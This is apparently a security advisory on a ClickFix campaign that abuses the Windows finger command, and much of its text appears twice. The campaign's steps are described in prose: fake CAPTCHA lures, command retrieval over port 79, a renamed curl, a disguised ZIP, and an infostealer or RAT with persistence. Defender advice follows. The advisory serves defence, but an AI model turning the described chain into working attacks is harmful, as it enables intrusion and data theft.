Decades-Old ‘Finger' Protocol Abused in Clickfix Malware Attacks
Summary:
Threat actors are reviving the decades-old finger command as part of new ClickFix-style social-engineering attacks on Windows systems. Originally designed to look up information about remote users over TCP port 79, the finger protocol is now being abused as a lightweight remote command-delivery mechanism. Recent campaigns trick victims, often through fake CAPTCHA prompts, into executing a command, that retrieves attacker-hosted commands and immediately executes them.
These attacks typically follow a sequence:
Security Officer Comments:
The renewed abuse of the finger protocol highlights a common trend: attackers increasingly repurpose legacy or obscure network utilities as LOLBINs to evade detection. Because finger is still present on Windows but almost never legitimately used, defenders may overlook it in monitoring, even though its output can be silently piped into cmd[.]exe to execute arbitrary code. The campaign’s alignment with ClickFix techniques, social engineering, fake CAPTCHA challenges, and human-in-the-loop execution, underscores that attackers continue to rely on user interaction to bypass technical controls. The inclusion of anti-analysis checks in newer samples suggests this actor is actively refining their tooling and intends to continue leveraging finger as a low-noise command-delivery channel. The shift from lightweight Python malware to a full-featured RAT such as NetSupport Manager also indicates an interest in longer-term access and remote control rather than simple credential theft.
Suggested Corrections:
While the current 'finger' abuse appears to be carried out by a single threat actor conducting ClickFix attacks, as people continue to fall for them, it is essential to be aware of the campaigns. For Defenders, the best way to block the use of the finger command is to block outgoing traffic to TCP port 79, which is what is used to connect to a daemon over the Finger protocol. User awareness remains critical, ClickFix continues to succeed because users are pressured into running commands manually.
Link(s):
https://www.bleepingcomputer.com/ne...-protocol-abused-in-clickfix-malware-attacks/
Threat actors are reviving the decades-old finger command as part of new ClickFix-style social-engineering attacks on Windows systems. Originally designed to look up information about remote users over TCP port 79, the finger protocol is now being abused as a lightweight remote command-delivery mechanism. Recent campaigns trick victims, often through fake CAPTCHA prompts, into executing a command, that retrieves attacker-hosted commands and immediately executes them.
These attacks typically follow a sequence:
- Use finger to pull down a command stream from an attacker-controlled server.
- Create random file paths and duplicate curl[.]exe under a random name.
- Use the renamed curl to download a ZIP file disguised as a PDF.
- Extract and run malware (Python-based infostealer or NetSupport Manager RAT).
- Persistence is established via scheduled tasks in newer variants
Security Officer Comments:
The renewed abuse of the finger protocol highlights a common trend: attackers increasingly repurpose legacy or obscure network utilities as LOLBINs to evade detection. Because finger is still present on Windows but almost never legitimately used, defenders may overlook it in monitoring, even though its output can be silently piped into cmd[.]exe to execute arbitrary code. The campaign’s alignment with ClickFix techniques, social engineering, fake CAPTCHA challenges, and human-in-the-loop execution, underscores that attackers continue to rely on user interaction to bypass technical controls. The inclusion of anti-analysis checks in newer samples suggests this actor is actively refining their tooling and intends to continue leveraging finger as a low-noise command-delivery channel. The shift from lightweight Python malware to a full-featured RAT such as NetSupport Manager also indicates an interest in longer-term access and remote control rather than simple credential theft.
Suggested Corrections:
While the current 'finger' abuse appears to be carried out by a single threat actor conducting ClickFix attacks, as people continue to fall for them, it is essential to be aware of the campaigns. For Defenders, the best way to block the use of the finger command is to block outgoing traffic to TCP port 79, which is what is used to connect to a daemon over the Finger protocol. User awareness remains critical, ClickFix continues to succeed because users are pressured into running commands manually.
Link(s):
https://www.bleepingcomputer.com/ne...-protocol-abused-in-clickfix-malware-attacks/